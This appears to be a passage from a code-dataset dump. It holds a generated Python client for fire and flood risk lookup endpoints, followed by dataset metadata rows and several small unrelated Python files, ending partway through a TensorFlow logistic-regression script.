_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
FireRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['fire_risk_by_address_request'] = \
fire_risk_by_address_request
return self.get_fire_risk_by_address_batch_endpoint.call_with_http_info(**kwargs)
def get_fire_risk_by_location(
self,
longitude,
latitude,
**kwargs
):
"""Get Fire Risk By Location # noqa: E501
Accepts latitude and longitude as input and returns fire risk data by risk type. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_risk_by_location(longitude, latitude, async_req=True)
>>> result = thread.get()
Args:
longitude (str): Longitude of Location
latitude (str): Latitude of Location
Keyword Args:
include_geometry (str): Flag to return geometry; default is N. [optional]
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
FireRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['longitude'] = \
longitude
kwargs['latitude'] = \
latitude
return self.get_fire_risk_by_location_endpoint.call_with_http_info(**kwargs)
def get_fire_risk_by_location_batch(
self,
fire_risk_by_location_request,
**kwargs
):
"""Post Fire Risk By Location # noqa: E501
This is a Batch offering for the 'Fire Risk By Location' service. It accepts a single location coordinate or a list of location coordinates and retrieves fire risk data by risk type. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_risk_by_location_batch(fire_risk_by_location_request, async_req=True)
>>> result = thread.get()
Args:
fire_risk_by_location_request (FireRiskByLocationRequest):
Keyword Args:
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
FireRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['fire_risk_by_location_request'] = \
fire_risk_by_location_request
return self.get_fire_risk_by_location_batch_endpoint.call_with_http_info(**kwargs)
def get_fire_station_by_address(
self,
address,
**kwargs
):
"""Get Fire Station By Address # noqa: E501
Accepts an address as input and returns the nearest fire stations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_station_by_address(address, async_req=True)
>>> result = thread.get()
Args:
address (str): Free-form address text
Keyword Args:
max_candidates (str): Specifies the maximum number of fire stations that this service retrieves. The default value is 3 and the maximum value is 5. The retrieved results are sorted by travel distance from the input location. [optional]
travel_time (str): Maximum travel time from the input location to a fire station. Maximum allowed is 2 hours. [optional]
travel_time_unit (str): minutes (default), hours, seconds, milliseconds. [optional]
travel_distance (str): Maximum travel distance from the input location to a fire station. Maximum allowed is 50 miles. [optional]
travel_distance_unit (str): Feet (default), Kilometers, Miles, Meters. [optional]
sort_by (str): time (default), distance. [optional]
historic_traffic_time_bucket (str): Historic traffic time slab. [optional]
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
FireStations
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['address'] = \
address
return self.get_fire_station_by_address_endpoint.call_with_http_info(**kwargs)
def get_fire_station_by_location(
self,
longitude,
latitude,
**kwargs
):
"""Get Fire Station By Location # noqa: E501
Accepts latitude and longitude as input and returns the nearest fire stations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_fire_station_by_location(longitude, latitude, async_req=True)
>>> result = thread.get()
Args:
longitude (str): Longitude of Location
latitude (str): Latitude of Location
Keyword Args:
max_candidates (str): Specifies the maximum number of fire stations that this service retrieves. The default value is 3 and the maximum value is 5. The retrieved results are sorted by travel distance from the input location. [optional]
travel_time (str): Maximum travel time from the input location to a fire station. Maximum allowed is 2 hours. [optional]
travel_time_unit (str): minutes (default), hours, seconds, milliseconds. [optional]
travel_distance (str): Maximum travel distance from the input location to a fire station. Maximum allowed is 50 miles. [optional]
travel_distance_unit (str): Feet (default), Kilometers, Miles, Meters. [optional]
sort_by (str): time (default), distance. [optional]
historic_traffic_time_bucket (str): Historic traffic time slab. [optional]
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
FireStations
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['longitude'] = \
longitude
kwargs['latitude'] = \
latitude
return self.get_fire_station_by_location_endpoint.call_with_http_info(**kwargs)
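# Hypothetical async usage sketch for the method above (the `api` instance,
# coordinates, and limit values are made up for illustration):
#
#     thread = api.get_fire_station_by_location(
#         '-73.9857', '40.7484',
#         max_candidates='3',
#         travel_distance='10',
#         travel_distance_unit='Miles',
#         async_req=True,
#     )
#     stations = thread.get()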
def get_flood_risk_by_address(
self,
address,
**kwargs
):
"""Get Flood Risk By Address # noqa: E501
Accepts an address as input and returns flood risk data for flood zones and base flood elevation values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flood_risk_by_address(address, async_req=True)
>>> result = thread.get()
Args:
address (str): Free-form address text
Keyword Args:
include_zone_desc (str): Flag to return the zone description. [optional]
include_geometry (str): Flag to return geometry. [optional]
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is the total request timeout. It can
also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies whether type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies whether type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force the body content-type.
Default is None, in which case the content-type is inferred
from the allowed content-types and the body.
_host_index (int/None): specifies the index of the server
to use.
Default is read from the configuration.
async_req (bool): execute the request asynchronously
Returns:
FloodRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['address'] = \
address
return self.get_flood_risk_by_address_endpoint.call_with_http_info(**kwargs)
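# Illustrative usage sketch (commented out). The "api" client object and
# the sample address below are assumptions for illustration; only the
# keyword arguments come from the docstrings above:
#
#   # synchronous call (default)
#   result = api.get_flood_risk_by_address("some free-text address")
#   # asynchronous call: returns a thread whose .get() yields the result
#   thread = api.get_flood_risk_by_address("some free-text address", async_req=True)
#   result = thread.get()
#   # per-request timeout: a single total timeout, or a (connect, read) pair
#   result = api.get_flood_risk_by_address("some free-text address", _request_timeout=(3.05, 27))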
def get_flood_risk_by_address_batch(
self,
flood_risk_by_address_request,
**kwargs
):
"""Post Flood Risk By Address # noqa: E501
This is a batch offering for the 'Flood Risk By Address' service. It accepts a single address or a list of addresses and retrieves flood risk data for flood zones and base flood elevation values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flood_risk_by_address_batch(flood_risk_by_address_request, async_req=True)
>>> result = thread.get()
Args:
flood_risk_by_address_request (FloodRiskByAddressRequest):
Keyword Args:
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is used as the total request timeout. It
can also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FloodRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['flood_risk_by_address_request'] = \
flood_risk_by_address_request
return self.get_flood_risk_by_address_batch_endpoint.call_with_http_info(**kwargs)
def get_flood_risk_by_location(
self,
longitude,
latitude,
**kwargs
):
"""Get Flood Risk By Location # noqa: E501
Accepts latitude & longitude as input and returns flood risk data for flood zones and base flood elevation values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flood_risk_by_location(longitude, latitude, async_req=True)
>>> result = thread.get()
Args:
longitude (str): Longitude of Location
latitude (str): Latitude of Location
Keyword Args:
include_zone_desc (str): Flag to return zone description. [optional]
include_geometry (str): Flag to return Geometry. [optional]
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is used as the total request timeout. It
can also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FloodRiskResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['longitude'] = \
longitude
kwargs['latitude'] = \
latitude
return self.get_flood_risk_by_location_endpoint.call_with_http_info(**kwargs)
def get_flood_risk_by_location_batch(
self,
flood_risk_by_location_request,
**kwargs
):
"""Post Flood Risk By Location # noqa: E501
This is a batch offering for the 'Flood Risk By Location' service. It accepts a single location coordinate or a list of location coordinates and retrieves flood risk data for flood zones and base flood elevation values. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_flood_risk_by_location_batch(flood_risk_by_location_request, async_req=True)
>>> result = thread.get()
Args:
flood_risk_by_location_request (FloodRiskByLocationRequest):
Keyword Args:
_return_http_data_only (bool): return the response data only,
without the status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding the response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
a single number is provided, it is used as the total request timeout. It
can also be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
FloodRiskResponseList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['flood_risk_by_location_request'] = \
flood_risk_by_location_request
return self.get_flood_risk_by_location_batch_endpoint.call_with_http_info(**kwargs)
| 39.099102 | 259 | 0.513979 | 12,090 | 130,591 | 5.28048 | 0.028371 | 0.0289 | 0.019549 | 0.0203 | 0.973356 | 0.961107 | 0.93324 | 0.914679 | 0.890384 | 0.879388 | 0 | 0.003603 | 0.404905 | 130,591 | 3,339 | 260 | 39.110812 | 0.817884 | 0.361962 | 0 | 0.711445 | 0 | 0 | 0.258835 | 0.06512 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011047 | false | 0.010605 | 0.012373 | 0 | 0.034468 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eb56d9490a5d1f6969032089c31c489e2d02cab9 | 43 | py | Python | app/__init__.py | bruh-boys/reddit-automata | fc433847be8f6b76dfcf597b96c696598af58383 | [
"MIT"
] | 7 | 2022-01-05T09:28:53.000Z | 2022-02-01T23:41:07.000Z | app/__init__.py | bruh-boys/reddit-automata | fc433847be8f6b76dfcf597b96c696598af58383 | [
"MIT"
] | null | null | null | app/__init__.py | bruh-boys/reddit-automata | fc433847be8f6b76dfcf597b96c696598af58383 | [
"MIT"
] | null | null | null | from .text import *
from .generate import * | 21.5 | 23 | 0.744186 | 6 | 43 | 5.333333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 43 | 2 | 23 | 21.5 | 0.888889 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
eb91004a7fe693a277ad3e9fde8b381a0547fad2 | 734 | py | Python | tests/test_table_figure_row.py | cmx/cmx-python | 02d2b71ac3d7d640764c8b0778018468d8abe337 | [
"MIT"
] | 1 | 2021-07-27T13:25:14.000Z | 2021-07-27T13:25:14.000Z | tests/test_table_figure_row.py | cmx/cmx-python | 02d2b71ac3d7d640764c8b0778018468d8abe337 | [
"MIT"
] | null | null | null | tests/test_table_figure_row.py | cmx/cmx-python | 02d2b71ac3d7d640764c8b0778018468d8abe337 | [
"MIT"
] | null | null | null | from cmx.backends.components import Article
doc = Article()
table = doc.table()
row = table.figure_row()
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
row = table.figure_row()
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
row.figure(src="some_file.png", title="some title", caption="some text")
print(table._md)
| 40.777778 | 72 | 0.72752 | 118 | 734 | 4.432203 | 0.161017 | 0.137667 | 0.183556 | 0.244742 | 0.860421 | 0.860421 | 0.860421 | 0.860421 | 0.860421 | 0.860421 | 0 | 0 | 0.081744 | 734 | 17 | 73 | 43.176471 | 0.775964 | 0 | 0 | 0.714286 | 0 | 0 | 0.348774 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0.071429 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ebbbc7d5c1cd00c2a9d50ccce8fea8d41838b094 | 206 | py | Python | orio/utils.py | NIEHS/orio | bf996ebcf41d14b945cd5848460b023376b637ad | [
"MIT"
] | 6 | 2017-04-19T08:49:20.000Z | 2020-12-18T16:13:28.000Z | orio/utils.py | NIEHS/orio | bf996ebcf41d14b945cd5848460b023376b637ad | [
"MIT"
] | null | null | null | orio/utils.py | NIEHS/orio | bf996ebcf41d14b945cd5848460b023376b637ad | [
"MIT"
] | 1 | 2020-12-18T16:14:45.000Z | 2020-12-18T16:14:45.000Z | import os
def get_data_path():
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'data'))
def get_bin_path():
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'bin'))
| 20.6 | 75 | 0.708738 | 34 | 206 | 3.941176 | 0.352941 | 0.268657 | 0.179104 | 0.238806 | 0.746269 | 0.746269 | 0.746269 | 0.746269 | 0.746269 | 0.746269 | 0 | 0 | 0.116505 | 206 | 9 | 76 | 22.888889 | 0.736264 | 0 | 0 | 0 | 0 | 0 | 0.033981 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0 | 0.2 | 0.4 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 11 |
ebc3594fe756628916520df4dd0d002e1e0c30ef | 129 | py | Python | tests/robotframework_ls_tests/__init__.py | Snooz82/robotframework-lsp | 5f6666968f59111a5c478afd54df055d23d7274c | [
"Apache-2.0"
] | null | null | null | tests/robotframework_ls_tests/__init__.py | Snooz82/robotframework-lsp | 5f6666968f59111a5c478afd54df055d23d7274c | [
"Apache-2.0"
] | null | null | null | tests/robotframework_ls_tests/__init__.py | Snooz82/robotframework-lsp | 5f6666968f59111a5c478afd54df055d23d7274c | [
"Apache-2.0"
] | null | null | null | from _pytest.assertion import register_assert_rewrite
register_assert_rewrite("robotframework_ls_tests.language_server_client")
| 32.25 | 73 | 0.906977 | 16 | 129 | 6.75 | 0.8125 | 0.259259 | 0.388889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 129 | 3 | 74 | 43 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0.356589 | 0.356589 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
ccd7fa4239947140657d53aeeca00a323af20a61 | 8,272 | py | Python | build/lib/tec/ic/ia/p1/g08_regresion.py | Fuabioo/Proyecto-1---Predicci-n-Votaciones | d22796ca72e07a5cf4a3ecbeeabffd4cd6ac004f | [
"MIT"
] | null | null | null | build/lib/tec/ic/ia/p1/g08_regresion.py | Fuabioo/Proyecto-1---Predicci-n-Votaciones | d22796ca72e07a5cf4a3ecbeeabffd4cd6ac004f | [
"MIT"
] | null | null | null | build/lib/tec/ic/ia/p1/g08_regresion.py | Fuabioo/Proyecto-1---Predicci-n-Votaciones | d22796ca72e07a5cf4a3ecbeeabffd4cd6ac004f | [
"MIT"
] | 1 | 2021-10-20T22:13:04.000Z | 2021-10-20T22:13:04.000Z | import numpy
import pandas
from tec.ic.ia.p1 import g08_data
from tec.ic.ia.pc1 import g08
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
from sklearn.model_selection import train_test_split
from keras.utils import np_utils
import tensorflow as tf
# fix random seed for reproducibility
def regression():
seed = 7
numpy.random.seed(seed)
learning_rate = 0.001
num_epochs = 1500
display_step = 300
# load dataset
[X1, Y1],[X2, Y2],[X3, Y3] = g08_data.shaped_data_regression(10000)
x_train, x_test, y_train, y_test = train_test_split(X1, Y1, test_size = 0.1, random_state=0)
num_features = x_train.shape[1]
learning_rate = 0.01
training_epochs = 1000
tf.reset_default_graph()
# for visualization purposes in TensorBoard we use tf.name_scope
with tf.name_scope("Declaring_placeholder"):
# X is a placeholder for the input features. We will feed data later on
X = tf.placeholder(tf.float32, [None, len(x_train[0])])
# y is a placeholder for the labels. We will feed data later on
y = tf.placeholder(tf.float32, [None, len(y_train[0])])
with tf.name_scope("Declaring_variables"):
# W is our weights. This will update during training time
W = tf.Variable(tf.zeros([len(x_train[0]), len(y_train[0])]))
# b is our bias. This will also update during training time
b = tf.Variable(tf.zeros( [len(y_train[0])] ))
Z = tf.add(tf.matmul(X, W), b)
prediction = tf.nn.softmax(Z)
# Calculate the cost
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits = Z, labels = y))
# Use Adam as optimization method
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
init = tf.global_variables_initializer()
cost_history = numpy.empty(shape=[1],dtype=float)
with tf.Session() as sess:
sess.run(init)
for epoch in range(training_epochs):
_, c = sess.run([optimizer, cost], feed_dict={X: x_train, y: y_train})
#print("Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(c), \ "W=", sess.run(W), "b=", sess.run(b))
cost_history = numpy.append(cost_history, c)
# Calculate the correct predictions
correct_prediction = tf.to_float(tf.greater(prediction, 0.5))
# Calculate accuracy on the test set
accuracy = tf.reduce_mean(tf.to_float(tf.equal(y, correct_prediction)))
prediction=tf.argmax(Z,1)
pred = prediction.eval(feed_dict={X: x_train}, session=sess)
first = [g08.PARTIDOS[int(pred[i])] for i in range(len(pred))]
pred = prediction.eval(feed_dict={X: x_test}, session=sess)
y_classes = [numpy.argmax(y, axis=None, out=None) for y in y_test]
success = 0
for i in range(len(pred)):
if pred[i] == y_classes[i]:
success += 1
first_acc = (100*success/len(pred))  # accuracy as a percentage
first += [g08.PARTIDOS[int(pred[i])] for i in range(len(pred))]
first_acc_train = accuracy.eval({X: x_train, y: y_train})
x_train, x_test, y_train, y_test = train_test_split(X2, Y2, test_size = 0.1, random_state=0)
num_features = x_train.shape[1]
learning_rate = 0.01
training_epochs = 1000
tf.reset_default_graph()
# for visualization purposes in TensorBoard we use tf.name_scope
with tf.name_scope("Declaring_placeholder"):
# X is a placeholder for the input features. We will feed data later on
X = tf.placeholder(tf.float32, [None, len(x_train[0])])
# y is a placeholder for the labels. We will feed data later on
y = tf.placeholder(tf.float32, [None, len(y_train[0])])
with tf.name_scope("Declaring_variables"):
# W is our weights. This will update during training time
W = tf.Variable(tf.zeros([len(x_train[0]), len(y_train[0])]))
# b is our bias. This will also update during training time
b = tf.Variable(tf.zeros( [len(y_train[0])] ))
Z = tf.add(tf.matmul(X, W), b)
prediction = tf.nn.softmax(Z)
# Calculate the cost
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits = Z, labels = y))
# Use Adam as optimization method
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
init = tf.global_variables_initializer()
cost_history = numpy.empty(shape=[1],dtype=float)
with tf.Session() as sess:
sess.run(init)
for epoch in range(training_epochs):
_, c = sess.run([optimizer, cost], feed_dict={X: x_train, y: y_train})
#print("Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(c), \ "W=", sess.run(W), "b=", sess.run(b))
cost_history = numpy.append(cost_history, c)
# Calculate the correct predictions
correct_prediction = tf.to_float(tf.greater(prediction, 0.5))
# Calculate accuracy on the test set
accuracy = tf.reduce_mean(tf.to_float(tf.equal(y, correct_prediction)))
prediction=tf.argmax(Z,1)
pred = prediction.eval(feed_dict={X: x_train}, session=sess)
